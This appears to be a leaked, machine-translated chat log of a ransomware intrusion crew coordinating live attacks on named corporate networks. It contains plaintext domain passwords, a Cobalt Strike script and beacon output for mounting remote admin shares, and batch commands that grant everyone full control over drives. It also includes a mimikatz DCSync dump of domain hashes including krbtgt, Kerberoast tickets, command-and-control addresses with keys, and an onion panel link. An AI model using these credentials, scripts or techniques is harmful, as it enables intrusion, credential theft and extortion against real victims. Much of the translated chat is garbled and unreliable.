As soon as you jump into the process you look at the databases list by default there is sqlcmd tool installed on the server it has direct access to the data to backup the sqlwriter, sqlsrv processes on the sql server) workedI press the bind nothing happens what? @tl1Yt hf,jnftn&https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/tools/1vpn check thereupon there is access to the domain no load for egoghbdtnHi, our evo vpn has fallen offHiHiHiWell, now checking did you check wilson? did the file appear on the unshared armas? flew home where we have @user9? how unexpected and niceaaa we miss our family as much as you)missed you?)helloTo all helloDo you want me to ask everyone in the confuskinu to the appropriate confuaga, I'll dig in the records of strangers to see what there may be interestingthem the difficulty, as I understand from @user7 is to find a sphere / backups? well, let's finish today probably? there he is small aha)as you see - norrivet good evening! @tl1 not yet?
BACKUP$
BACKUPDVR$
CHIBACKUP2020$
CLEBACKUP$
CLEBACKUP2020$
DVRBACKUP2020$
DVRNEWBACKUP20$
KCBACKUP2020$
KCNEWBACKUP2020$
NEWBACKUPCHI$
NEWBACKUPCLE$

``````
\BLAUERPC\D$
\DRB2\Archive
\\{\DRB2\Backup
\\Replication
\\GKELLER/G$/Backup
\\GKELLER/G$/WW2k1/IT/SolarwindsBackups
\REPORTING\D$\SQLBackup
\\Data\AKPRO_Data\BACKUPS
\WW2K1\F$/Backup
\WW2K1\F$Data\AKPRO_Data\BACKUPS
\\{\WWSQL\S$\SQLBackup
``.``WATERWAY\blauer 11915Admin2179!````
http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!
WATERWAY\mharper LoveUnit14
``Good evening. we're here)))))Thank you for such flattering words, and @tl1 is also a pleasure to work with
I wish I could find some red words, but I'll just respond with... an anecdote!

A pentester is walking through the desert, he wants sex, he meets a genie, and he asks him "What do you want, traveler?"
-Fucking, says the pentester.
And then out of nowhere appears a bunch of all sorts of spheres without creed, not decrypted hashes on kmd5, nets in which the domain is not visible and a billion all kinds of avers

-Get the fuck out of here,‖ jinny answers. -Yes, the last thing I wanted to say, while you're resting, think about whether any of you want to take additional offline courses through the official pentester refresher course.
CEH, OSCP and the like
So have a nice holidays) see you next year) Likewise) We are also happy to work with you )From us too we want to say thank you, it is a very useful experience, especially in a short period of time. My head is boiling, but it is interesting) Happy New Year to you = ) )In short - all are good) the most difficult passed) further will only be more interesting) from my experience, I say that in comparison, you are growing very fast on the technical part, small zatupy have all, and this is normal
But next year we'll get to a completely different speed, start parallel technologies, dig nixes
i for my part and @tl1 and the development team will also be preparing some cool stuff for you
hope i am not mistaken)and for a very short time by the standards of junior pentests we have come a long way from 0 to the current cases with the flag -nomutex so i want to share my impressionsthen see you soon) backups in work, the backups are working and i'll be back up by 21 til next tuesday. i will be back up by 21 tuesday but report here now please = )
so @tl1 knows what's the plan)
who can today - pull up to 21
if no one can, go on vacation
I don't know anything.)
At @tl1 let's ask)last day also in case of success? >last case on the last dayvono, of course, no problem, if anyone else can not - say, today "at will" with bonuses in case of success of the work itselfvtl1 we'll have a day of groundhogs at me at all
I just looked at the calendar for the first time in a week and a half or two I will be able to communicate, but not in the office, in the evening I fly away
I was planning to go on holiday today, so the tickets are bought(
i think the guys will cope with a small network without me a good question, i think to finish some last case on the last day =)and for what, like we said on holidays go away ... friends, today's case comes to an end, as the final touches to backup will be solved, the server and workstation checked - all go to rest
@tl1 said before leaving that we're going to 21, have time to rest?[ ](https://mediaeveryone.com/channel/general?msg=FtyaEbnGv588f4knR) Well, another plus exeshnik is a lot of threads. icacls a long teamdobavliv grunt fullpo therefore exeşnik seemed easier) there batnick also swore - and Timlid2 said, I threw you in private, something about regulars, etc.so polis are more swearing ehena exe and scatterbatnik easier than ehesut same in order to scatter on armieswhy not batnick?and build me, in laba runningasdavayne, if grunt full works fine then add it to the exeştnik - minute and so and so ran from the admin? i checked in the laba batnick - no problem with this no - vorkgruktachka outside the domain?
Node Name: DESKTOP-5SMSDNR OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18363 N/A OS Manufacturer: Microsoft Corporation OS Settings: Isolated Workstation OS Build: Multiprocessor Free Registered Owner: User Registered Organization: Product Code: 00330-80000-00000-AA618 Installation Date: 09/16/2020, 13:38:44 System Boot Time: 12/22/2020, 1:54:35 System Manufacturer: Gigabyte Technology Co.                                                         System model: G31M-ES2L System type: x64-based PC Processor(s): Number of processors - 1.                                                                                                  [01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2834 MHz BIOS version:                      Award Software International, Inc. FF, 10/13/2009 Windows folder: C:\Windows System folder: C:\Windows\system32 Boot device:              \Device\HarddiskVolume1 System language: ru;Russian Input language: ru;Russian Time zone: (UTC+03:00) Moscow, St. Petersburg Full physical memory: 4,085 MB Available physical memory: 715 MB Virtual memory: Max size: 5,621 MB Virtual memory: Available: 828 MB Virtual memory: Used: 4,793 MB Swap file location: C:\pagefile.sys Domain: WORKGROUP Network login server:              \DESKTOP-5SMSDNR Patch(s): Number of installed patches - 12.                                                                                   [01]: KB4586878 [02]: KB4513661 [03]: KB4516115 [04]: KB4517245 [05]: KB4521863 [06]: KB4561600 [07]: KB4576751 [08]: KB4576754 [09]: KB4577670 [10]: KB4580325 [11]: KB4586863 [12]: KB4592449 Network adapters: Number of network adapters - 2.                                                                                            [01]: Qualcomm Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.30) Connection Name: Ethernet DHCP enabled: Yes DHCP server: 192.168.88.1 IP address [01]: 192.168.88.248 [02]: fe80::d935:55:e14f:fe49 [02]: VirtualBox Host-Only Ethernet Adapter Connection Name: VirtualBox Host-Only Network DHCP enabled: None IP address [01]: 192.168.56.1 [02]: fe80::f4c1:748b:225c:98a0 Hyper-V Requirements:               Virtual machine monitoring mode extensions: Yes Virtualization enabled in firmware: Yes Layer 2 address conversion: No Data execution prevention available: Yes
``vin10version os etc.'' Where do you run it?
System error 1332.                                                                                                                                                                                                                          Matching between user names and security identifiers has not been performed.  
``there - where?'' without grunt full, it's just going the wrong way.
C:\Users\awilson\Desktop>1.bat

C:\Users\awilson\Desktop>net share c=c: /grant:everyone,full
c was shared successfully.


C:\Users\awilson\Desktop>net share d=d: /grant:everyone,full
d was shared successfully.


C:\Users\awilson\Desktop>net share e=e: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.


C:\Users\awilson\Desktop>net share f=f: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.


C:\Users\awilson\Desktop>net share g=g: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.
NET share A=A: / grant:everyone,full`` you have a space there so lol)`` the same principle read a file that doesn`t exist so what do you want?
C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: / grant:everyone,full Unknown parameter /.                                                                                                                                                                                                                         Syntax for this command: NET SHARE shared_resource shared_resource=disk:path [/GRANT:user,[READ | CHANGE | FULL]] [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents| Programs | BranchCache | None] shared_resource [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents | Programs | BranchCache | None] {shared_resource | device_name | drive:path} /DELETE shared_resource \\computer_name /DELETE For more help, type NET HELPMSG 3506.                                                                                                                                                                                                                                                                                                            C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: /grant:everyone,full System error 1332.                                                                                                                                                                                                                          The mapping between user names and security identifiers has not been done.  
I ran the lead on our office computer. win10what was the environment? So it was in the batch file and it was telling me "I can't match something to something" I don't know what it was telling me?
/grant:everyone,full
```
it's not working at all ```
/grant Everyone:F /T /C /Q
/grant:everyone,full
```
did you take this into account? didn't you make this one?[ ](https://mediaeveryone.com/channel/general?msg=tTo8qqSowdwhX3xRy) not this one?[ ](https://mediaeveryone.com/channel/general?msg=BgFFK5gy8Bs3kp6Kx) what was the batik and the exechanger? I won't answer, you'll get scolded, did you make the batik and then the exechanger by any chance save it?good question, I do not know which of the confines of the wrote it guys who remember where @tl2 wrote about the driver balls, please copy them to health host specified in , the second argument) mapped only c$ balls thank you) `` ``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:28> share-mapper KCNEWBACKUP2020
[*] Attaching c$ in KCNEWBACKUP2020 host
[*] Tasked beacon to run: net use *\\\KCNEWBACKUP2020\c$ /PERSISTENT:YES
[*] Tasked beacon to run: net use
[+] host called home, sent: 115 bytes
[+] received output:
Drive Z: is now connected to \\KCNEWBACKUP2020\c$.

The command completed successfully.


[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:51> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.

``Check''.
#ShareMapper.cna
#Author: @noname
#no desc

beacon_command_register("share-mapper", "shares attacher",
    "Syntax: share-mapper [hostname1,hostname2,hostname3,hostname4]");

alias share-mapper {
    if ($2 is $null) {
        berror($1, "Need hosts!)
    } else {
        @hsts = split(",", ["$2" trim]);
        foreach $entry (@hsts) {
            blog2($1, "Attaching c\$ in $entry host");
            bshell($1, "net use * \\\\$entry\\c\$ /PERSISTENT:YES");
        }
        bshell($1, "net use");
    }
}
``For fuck's sake,``
already threw it here, not alive? if not - to reopen then @tl1 ok?
$krb5tgs$23$*sqlman$epctech.com$MSSQLSvc/sqlsrv02.epctech.com ydkwicd
``Truthfully not yet tested myself)looks interesting, but what is the "poc.exe", is it an exploit or just a tool so that the file will not be deleted? not really understand ithttp://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/ but not in 2 we guessed) no new sessions today)mm-hmmm, then continue to work dahdal @tl2 ? and where do we have @user1 and @user3? it's ok)) and @tl2 just re-snap the accessible kerb) how to check it? there are kerbs disconnected accounts yes you get the idea if the kerb LA on the server somewhere there may well be hash admin and so you can try to kerb that will unbroken check on the car from which was kerbdakerby just there?so what's the difference between admin/non-admin in this case, I'll look at the ticketsThey've deleted a lot of admins, and now the kerbs are only on the absent.no kerbs (kerbs only faster @tl2 now I'll change it so it will be better you at least change your ava) it's ok, keep quiet for a minute and he'll see for himself) look who wrote it, never mind the point it does not matter he read and did not understand it and what? well, read it carefully and what did you throw it at me first?[ ](https://mediaeveryonecom/channel/general?msg=4EFEQi79LBrjifoBX) Yeah[ ](https://mediaeveryone.com/channel/general?msg=BhrQCGmk6EgJ9rrLj) 1kerbs will be the same no matter what car they were shot on? Not me)re-shoot and direct to @tl2Need to re-shootYes, the old ones went stale...there is an alternative solution for snpartners, there are yes - but the farm is not there yet (and we have no kerbs at all so the farm will be in 2 weeks anyway kerbs yes no kerbs are you kerbs filmed?we're trying to get the credits YES[ ](https://mediaeveryone.com/channel/general?msg=BDC8RKTmvoJ8CaP9h) :dog:[ ](https://mediaeveryone.com/channel/general?msg=v8ebbs3n7d6WSkYjs) ?as it turns out nothing) (also a joke, don't take it seriously) you know? and today you said "by ten" and then "by two" you said "by ten", and? it's clear, you just said the same) i didn't understand what i wrote
?[ ](https://mediaeveryone.com/channel/general?msg=w5zjzpnoK9RJLRAy5) by two ?
?I have deja vu[ ](https://mediaeveryone.com/channel/general?msg=nkgf4mWcASkFHjag6) it's on the oldbut there will be new ones closer to 10That just came in. Are the new ones coming? or can the chinese come back? while there are no new ones, what are the old ones doing now? on #stanthonyskc-com too on #snpartners-com nothing newHow are the tasks going?:space_invader:helloHow is the progress on the others? the chinese are not back, no new ones... What time do we wrap it up at 6:00? What time tonight?
Sessions is stuck.
Thanks a lot and I've got it... if you use parameter --public-only then it will show only those where user admin[ ](https://mediaeveryone.com/channel/general?msg=2iRoChhq3cHrToCzj) by default 50 like the threads are turned up to max... but that's cool. why is it so monsterrickly fast? no it's not, it'll show the balls and take the list from the adtoot just sharers I think ad is only used with ips?
execute-assembly SharpSharesNG.exe shares ad --alive --output file.txt
```
correct ?ops)``execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt `` ping the fostlist )``
        * SharpSharesNG <ips|shares> --max-threads 10 --output console|/path/to/file
         *
         * ips - equiv ips ad
         * ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path
         * ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path
         * ips HostName [--os-detect] [--alive] [--exec] script\path
         * ips [ad] [--os-detect] [--alive] [--exec] script\path
         * ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path
         *
         *
         * shares - equiv shares ad
         * shares 10.0.0.1 [--os-detect] [--public-only]
         * shares 10.0.0.1/24 [--os-detect] [--public-only]
         * shares HostName [--os-detect] [--public-only]
         * shares [ad] [--os-detect] [--public-only]
         * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
``She's, secludes? or just start it and it spits somewhere? is there any argument? @all share please ѕharshareset one and a half pk@user8 with @user3 are preparing which of ?today we close one networkhowever not, there already all in water how is it? if not collects detailed report in confusobirthing nothin, tried three times - not collects work tules panel what, not working?hmchet all the same lostprobuyuje@tl1 reboot my dedikt plz)))) boshyuyaa all so we kolupali so a month in zohocorpinadaworkgroup? and vg is what? meanwhile study the methods of work through vpn in vg20 min then recurse you now without a task?what did you read in the mail? was it my versionoffline backups? understand how you recovered and what you missed?
beacon> shell nltest /dclist:waterway.com
[*] Tasked beacon to run: nltest /dclist:waterway.com
[+] host called home, sent: 58 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
```
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
``You threw the output with fqdn and that's what I threw the output from try to get the DC list from the list /dclist:shell nltets /dclist:yeah, fuck it```
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully

``just went to the cheknudomnoy authorization is there? hello2sessions in the water left? all bruhtoff zapatosessione not come to life, bullet? okzaytit went so, and what do you mean by ``works``?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=8s4fa9XpaArr2fSGh) this works?yeah i mean we're gonna close today for sure, no matter what we found, no we didn't find it, we're gonna bust it so yeah, we tried it, if we don't find any nass codes, fuck it, so you're probably gonna bust it without me, 3 kobos per lock
https://evatip.com
192.254.77.250:50200
zezrvNUA5VicElRQH0F2NvFJmQffkD391v
``````
https://somerd.com
172.93.102.117:40834
Q4H0EEjbHL7KlOZabfBcWTQWMcEM73agjH
``````
https://prorean.com
192.254.76.214:10340
5zYDiYJQI0dLjj4AXTUguzvJhauFWffMgIA
``I'm going to throw the builds in there coba blocked again...
in the main domain `OSDJIGHF&8SYIG*H<Orisjlfosepd````
10.7.6.124 [ ] [Apache] [ StorSimple :: Login]
10.7.6.123 [ ] [Apache] [ StorSimple :: Login]
10.7.6.125 [corpkioss01 ] [Apache] [ StorSimple :: Login]
http://10.7.6.122/
corpkioss01
/Login.aspx?ReturnUrl=%2fDefault.aspx
``````
beacon> shell dir \\10.7.6.127\C$
[*] Tasked beacon to run: dir \\10.7.6.127\C$
[+] host called home, sent: 50 bytes
[+] received output:
 Volume in drive \10.7.6.127\C$ has no label.
 Volume Serial Number is D68F-16CB

 Directory of \10.7.6.127$

05/09/2016 11:32 a. m.             1,024 .rnd
05/09/2016 11:57 a. m.                 0 2016-09-05_ImportTool.log
30/04/2015 10:27 a. m.    <DIR> inetpub
22/08/2013 09:52 a. m.    <DIR> PerfLogs
10/02/2021 12:57 p. m.    <DIR> Program Files
23/11/2020 09:51 p. m.    <DIR> Program Files (x86)
09/02/2021 10:31 a. m.    <DIR> quarantine
16/10/2018 10:09 a. m.                17 SA.txt
29/04/2015 04:41 p. m.    <DIR> sysprep
08/05/2018 11:46 a. m.    <DIR> temp
10/02/2021 12:46 p. m.    <DIR> Users
10/02/2021 01:01 p. m.    <DIR> Windows
24/12/2020 04:35 a. m.                17 WINDOWS-OS-NoPetyaVac-Perfc.log
               4 File(s) 1,058 bytes
               9 Dir(s) 15,374,311,424 bytes free

beacon> shell type \\10.7.6.127\C$\SA.txt
[*] Tasked beacon to run: type \\\10.7.6.127\C$\SA.txt
[+] host called home, sent: 58 bytes
[+] received output:
T3l3v1$a$f32018

````CORPKIOBEY01.corp.televisa.com.mx
User name ES050616C
Full Name Servicio ES050616C
Comment CORP - 4337626 - Alta 13/02/2019 - Responsable: Jose Juan Muniz Mendoza. Responsable 2: Adrián Ruíz Mondragon
User's comment
Country/region code (null)
Account active Locked
Account expires Never

Password last set 2/12/2021 1:08:33 AM
Password expires 6/12/2021 1:08:33 AM
Password changeable 2/13/2021 1:08:33 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/11/2021 2:05:13 PM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
The command completed successfully.

``Well, then let's close today. You've speeded up two more trusts?
Teemo[TVSAKIODC01]SYSTEM */14100|2021Feb12 22:01:17> dcsync televisa.com.mx
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:televisa.com.mx /all /csv command
[+] host called home, sent: 296050 bytes
[+] received output:
[DC] 'televisa.com.mx' will be the domain
[DC] 'TVSAKIODC01.televisa.com.mx' will be the DC server
[DC] Exporting domain 'televisa.com.mx'
1179 SUPPORT_388945a0 05efac43a75cbf1f9e0b5983388f0505 66050
1160 sqladmin 498090ea0039bb36c573ef1fdf44e057 512
1143 KMSERVER 498090ea0039bb36c573ef1fdf44e057 514
6112 CWAServiceR1 ba7a1a7b42cd6fca35e67934194fca3c 514
6114 CWAService 6d5358f32a4d90f95980d7ceac959ee3 514
10673 api_pcm 4752cedd65b600826b8127c0430b3229 512
3109 bcaaa 06dc2514c2db0538319d28696eb75048 512
1618 Bluecoat 598ebb718da96396882a92f0b06c1325 512
1163 faxsrb fb372aa6ad7b9fe5ef8d5c1d054b3ff5 512
3634 Secuser 2e98bed61ce00ceafdc3eb2baff38bc4c7 512
1144 SMEX_CORPSFEIMC2_MB 498090ea0039bb36c573ef1fdf44e057 512
10706 galconector 741ef92c4096e25cd9ca2bb035b936e9 512
11635 HER07353$ b4edb36586d9e88e77ce423036da700b 4096
11618 PFUP_CORPSFEE2K13C03 37aedba06eacc09febfbda0ac7300d32 66050
11637 CHA17748$ de734d182af1f6557645f67281f3e226 4096
10716 IntegraAD af13784e9fd24d835ed1b0c6beb732b0 512
1164 faxfsr fb372aa6ad7b9fe5ef8d5c1d054b3ff5 512
1156 fax 7921378373b150580c425e509cee0b67 512
10717 usertest e1ec7440a342194fb1c7dbd740e85150 512
13604 SFE14374$ 430ea89973288e676792d7db27b3c0f6 4096
12607 EXT222322$ b465b97732ffdf356b489e156ba71154 4096
10668 MSOL_cc65aefb7e47 5bd412e07e373e5208fcb0e9adcb7d5e 66048
7105 ASPNET 8e5565c861e68d5e494393e930d837c1 66048
502 krbtgt a8f855755087b7a7e77fff41520ce276 514
13607 CORPWKIOPWASP01$ d279ede88f4792c5e04283b60380fdef 4096
10719 EQUIPOSOI$ 1e8ddf8fe99606d7ad7c31859d904e5b 2080
1155 postmaster $350b0e4e9ef8e0b3898811c188bccd06 512
1614 FILIAL$ beb568b4ea6d599c3b79090778351b7d 2080
10678 adconnect-ser c637ccf59de4e482cb12cf0710852cda 512
11631 papercut 52f9bbcc4287129d2f4a8836504f909a 512
11608 SCMusr 24b9e746467c4a641a0d1700a3aeafad 512
11604 adselfservice 716f59258fcd6a7d993a47760ebd4588 1049088
1606 CORP$ 353a5296685c659cdb9c9559311491d9 2080
10709 BackupTVSA c6daf4f4415d449fc8f9669ba4274373 1049088
11640 TVSAKIODC01$ 40b09d82bc4e7e0fe4e5307d7cdb13de 532480
10721 SNG22422$ b7e92b54d847568f32a0dbd7f2eecadd 4096
14104 TVSAAZDC01$ 262d1133e881a5acadbe4e221619272d 532480
14604 TVSAAZDC02$ 45c89710df76b1b1d21daa3bf5e62add 532480
10701 userIAM 71bd5bde3fb863be74d93e069056c4ae 512
10688 acvreco 1aa20741229122764b5fa11c1bec4a96 1114624
10724 TVSASFEAPLP01$ 12ba718959d585cf376371a3a41850ae 4096
10689 opera_wintel_tvsa 0892cadd3c8a29eb2ce63750a3fcb666 512
500 iwam_gsctvsa 9a2a704c01c6cd5431ca50c3e9f99765 512
10712 ES050616 bd94f3117d2ff5b2c593e8b0c50a75c8 1049088
1112 TSM$ 4eece5dc248f0ccfd4527e45895e9438 2080
10674 EndPoint 1b88d8b5594f3c678e385e1542343a67 1049088
12606 TVSASFEDC01$ 4d4b699e863d4806627661b9b91e1fc2 532480
501 tvsanone 498090ea0039bb36c573ef1fdf44e057 514
``on the timing for AV[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=vMHwK69pr32FGW7mB) ?according to software tests to @user3there is a macaffi
it's not a fact that it's him, look for AV and drop vindeftoot another thing
they have a lot of traffic as soon as, on some domain
Traffic there is blocked, apparently some software
If we have an update on the igekt - dll can be launched by hand
Maybe we should first launch the dll from one session on the servers, then the armas
Then through the shell dir\tasklist will check if everything is ok, premium on the phno he is in testing + like brought updated shellcode inge you will get an account from that you have long asked still update with you parsed algorithm + look admin nasa, backups and stuff3 get into trusts2 people re-serialize this domainponyatot domain is a hashdump on dkkredov imports from cobi in clearing1 like a domain
CORP\jajimenezar Oxpp912341ek9$$!
``looks like a localhost domainCORPKIODC03 better to look at hypothetically adjacent serversha also think you understand that the triage can show tickets from adjacent domains today think we'll close then work on the forum?with rubeusno you got us confused here mimikom all right we did it rubeus in general that crap you recorded on the tickets? all under the record you at least record...not with each other we fucked with each other what can you do and you fucked so much another thing))) https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a``
[*] SamAccountName : SCMusr
[*] DistinguishedName : CN=Servicio SCM Users,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx
[*] ServicePrincipalName : MSSQLSvc/CORPSFEBDP115.corp.televisa.com.mx
[*] PwdLastSet : 2/9/2021 12:12:24 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*SCMusr$corp.televisa.com.mx$MSSQLSvc/CORPSFEBDP115.corp.televisa.co
                             m.mx*$42C55FA12C0A624AD1B4C709BE2ABD6F$CAD87F24C8123F7223B2966055EB4F62526A2B30F
                             1FAF55ABD1AB5E91C7EED4AABB0C77D9BA6C44770A4FFC6848F90DCAD36B8B706CD039A869FECFB6
                             B05903F25091851110A48D87B9336F42D423FDB7C6B49CA7D401CCB57A6C1718430D10BF19A3EDFE
                             E0B846C881C17D8324DCB3E7197837451AAF8532BC0E672672E5D25740033017FD0C3942D0CF661A
                             67F9848CD0A288C18EDB5FD3B55DDBF6FC126BF83201C7E409FC7A8295B03DC322DBFE8929827ED9
                             5058CF7F725F11F75B83B87920A35F0776DC676D4A6413D1DDC3CD109CA700B92169B818548257E5
                             26C4FBC10B1F50548B52D6163BBA957D541BC455F30F7F6B03CECBC762EA57C8A65968FB9D874996
                             97203C26893E08CD8611F7DD7F48690AAF4C6275FA17C0874A70FD16AA525668B37C84480D95A605
                             16626DB8B62426149E3887E81DEC1798E79510F82F5409E4E4028B0136E078F810DA0AF3BBBD0A3D
                             11A3939DAFACB79717267D1BF19475C6F98F6DABE8D342E727120C3723F207F633DC3E01DEE7D1D2
                             4EEA69AA85FD0B607699771F7A39AFF007407C58F1E9C38D64EEAA901F12A91D39E8060E8DB708BB
                             598AEBF7B1C5F6F4C52C71DD9AB817995F9817F15A06DEEBE8C12E3B1CFE5EE5C5BA79CC6BF8AE4B
                             22342099BFB9C2F9DD0E4E61F5495E8FE0627DE85E92B7ACC38D9E14207126D8186C0E961890D5FE
                             1A7ABD94E72EE5C81AC4E273E1DFBB4BF994A713BEB242C9E60F36DE060A752B711D8D5B1C83F01B
                             D1AD968498D4325E19A431D51A9DCE5A7EAD2F7714D3C038A4E48A89983D9A5C56FD80255397E53E
                             C75079B6CDFDFF680DAEBDA10E3B8EF7627A508E887C138CE1CD8E56DD7845B8028D98492001D58B
                             F4221DEF80FF5E20B083FFE90DF9EA15AA2B8A0004C750EABA59EC75FE4B72A73466A646128382FC
                             D0B5A485956B152476C3C3D593529691583F743D4A7BBDCA5DC7D9233905FC72DE6EE6019A76E086
                             E2A7BF031E6F7CE6A94820152267B669255D46CED47B7B28C7F4EF100C2945928A7634CDC22F6C89
                             7FCC9BCBE92CAA6C5DEC9AD6CA725600C97948E39DD4AB4A505F52011C8DCE0D9F8D5FC1FBAE8D28
                             98526442F98A1DAC0E2FC1354B77F2E67DCCA4227D981E5CDF2AD42A55D7396F9EE0AA4C3789E6E4
                             A157F7200D7FB4AFACC0F8426297FEA894DFA1EDB9F886EF859D6390F90C40E828914290AA4E5A77
                             DF2C4123F54D6C9EAA0DB25A1640BDA5871E53DF8751C41100AFED60409F63C1201E6A20B3E5CD64
                             933951D564F4A3D2F31875D0DCBA60C01540E1209CC9F87C98ACB32452BDB48A5494793EF1B8E59A
                             53098EE4C85D56707E0AED50E1799E136F6D244D1BBB7E3AC47D85AA622ADE9A33E332C2A06E84D3
                             7B05C20A1E66929AA8D2F12C082B4DDB73C29D72E48D3E75868652A12A43150C14C802F78DAA2BE9
                             1FAA1D70B2AA732356C1193BEE25C8E23FB21DB6D63C037ACE084B12FE5B3FF909863E17D3BB8621
                             B7C826F0676CF061AAAD4CCD5A23881469D8341EE4229C0851E49F16ABAFD69F37D47C84F2BA2521
                             9F39004124865AF6E39F0

``````
[*] SamAccountName : operaproy
[*] DistinguishedName : CN=Operador Proyectos,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx
[*] ServicePrincipalName : http/corpkionscep01
[*] PwdLastSet : 2/11/2021 5:25:45 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*operaproy$corp.televisa.com.mx$http/corpkionscep01*$AE3F395B8F841F2
                             BBF3B5D15CF33AF4D$E2E4DD0252CEBB03931A0BE1127FAC355AA2E7999A90E17114BDB7BEB3351D
                             EACE2F51673E0BE5035D5AFDD4E82F25B59370740C047C540CFD8DE7CB5B6BCAA95281EBD7261ADC
                             AAEB4F94903E291DC199DA75030FB19CC5CC693B57FB6EBC076A650CCF28AEA04FA476C3CA5FABEF
                             F7636496C8354D1EE4678D94F224F6B34D91749246F0E1FD0EFC694FA5CF7507C784D7B00E25E145
                             D14E8A30A4817A5D6AB0B6B1063C71DF771B77CF030A652A82C53BE0E508676D13ECA1578EE05489
                             1D99F382F2DE35E2D447BF885B8B4ECEE228A44A307AF1FAECD959389B4C748EF97AEDFD5021E948
                             D315F9A3037438A266DCC51B11F94F5F147A083CA34CBBCB8B1B04D75CD770F162661D1A9FE9FB81
                             DE3704381DFC8D1C3BA9295104A2F96A6E0DCA9E2D6BAF33F59DA9C1C3E6D9FC72C4589FE4EE25E6
                             07671D828E3C6B80E64FB761B3891D953B0E90D1052B88B20BA0C9F269E4C9BCCEC5F9CA622F4187
                             C2CEDADFC389ACAA03E764B75D24777E5D0665802A9DB84F2791B7303255B16BE250D5C1A9583CAA
                             3F0E344438C4DDB060BAF9DB9997EAE83B2EB28A7044E576BE05B81735A36FFCCF077FDAD0D03D10
                             DE8C4D71E75055B2BB0DBE2F75615159B28F15635917100C2AA3E5FC05154E94A85635173F3DCC2C
                             95E727F2D35168FA987E8322D3B2059137D40D1954B8E4CA4DF22B7CA63890C53B676DE2D61A019D
                             230817B4DD20E3563FEC2B6DFD6AF48B21213677CB17FFAC1BD80D395901CD85AFA6F4AD3E6FA3C4
                             812CAAFF3519F5365960D881D6EF4BEA00811827DB46587E707A7264A25803FB576C6451163138EB
                             A824517A5BC6671A4B8C4D15A40F2CA88D9BF075AE2A61EBC34898E3D1568F308326818DE2F42ED2
                             F45D47604B81678484A3EB2C519206254FFCE0F0E411B5454F3B59986F70B36D287EC32354498B95
                             FC25B107D13A431E4BE109C79D6FCFAF3377132F8B072AE121E098E18F4C6F9BF316A2EAE74DC52D
                             125813BF9515E472B1C034E0C8961082A1BF06125FD2C0D6D251A91B6A206B3E91BF0E3F7E3FA3BF
                             4FDDFD00ED37F47B650618EAD5FD39A74578D1AB278DFCAC20B09F0CF4A75FD8B28A29C8BB1A9002
                             4CE321685972C66EE40FE6BB9EDE9F108A2DFEE44F44C5098254E7448AAB772013E6B229DE516E1D
                             B7E7FC33FB2F39E1F0E63C026940A4EE97A7C762F4074284443169EF4BBEC9EC41EEB523C6B28CD5
                             82AB2D1CF56F2E9216F53BB4CE6D3F509B9A83CDC8ECBE6D733A84248763A1EE20BC667EE48659C1
                             B6BCD85AF942CFC193BEEE7AAC69A22B2BCF0602AAF564DA3988B6C7E6E1323E080AC6DFF52DA8C0
                             16C77DEF165F8BE2764BC71C1257B8F272B35B5C09BD5AC361577DE2FFFCFBF970524AA5DA5F78B9
                             4FC059AEBB8E86A4B20DDDFB841A10CF66D6326DD7E33544BA8BF177142009C9E011286B0EB8DD59
                             9CAEAEBE8B1E0C8047604E5FFCE4BB21229FC8D1B4795F4F7500B958BC4541D27096AEA010875C9F
                             D10D880CC601C28B6475226B9CC35D2C09DA9F39B4440B2D5044F3437362850E557A96B80EAE8C5F

``https://prog.world/we-analyze-attacks-on-kerberos-using-rubeus-part-2/
